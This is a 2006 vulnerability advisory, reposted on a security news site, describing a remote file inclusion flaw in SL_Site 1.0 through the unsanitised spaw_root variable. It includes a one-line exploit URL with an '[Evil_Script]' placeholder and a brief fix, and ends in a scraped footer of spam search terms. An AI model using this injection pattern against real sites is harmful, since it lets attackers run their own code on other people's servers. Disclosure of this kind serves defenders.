about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability




2006-09-07 SL_Site <= 1.0 (spaw_root) Remote File Include Vulnerability
Rated as : High Risk

---------------------------------------------------------------------------
SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability
---------------------------------------------------------------------------


Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
---------------------------------------------------------------------------

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SL_Site
version : 1.0
URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip
------------------------------------------------------------------


Exploit:
~~~~~
Variable $spaw_root not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.

#
http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]
---------------------------------------------------------------------------

Solution :
~~~~~~~
declare variabel $spaw_root
---------------------------------------------------------------------------


Shoutz:
~~~

# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
---------------------------------------------------------------------------

*/

Contact:
~~~~~

Nick: Kw3rLn
E-mail: ciriboflacs[at]YaHoo[dot]Com
Homepage: hTTp://RST-CREW.NET
_/*

-------------------------------- [ EOF] ----------------------------------
securitydot.net - 2006-09-07

Advertising

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 06:32:07 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
all cartoo 18years gi NARUOXXX CMS is Fre 200 /compo %2Fsearch% alexa.xuew microsoft Vulnerabil incest sto maxcpm.inf Sex cina Prison Br free sexto news for Karina kap C99shell Www.goole. sex gams postfix 2. booly wood Www.Newzel kanchaname www.bigbla cmj114.jim 3pik booly wood flickr t180t www.celebr maxcpm.inf maxcpm.inf www.xibu55 Fee sex explorer.j maxcpm.inf Path Discl Www trisha www.sexcom SEXtv www.chemic www.phonor animasion www.phonor Www.sexyla taihulenov aljin sign in Microsoft dmoz.im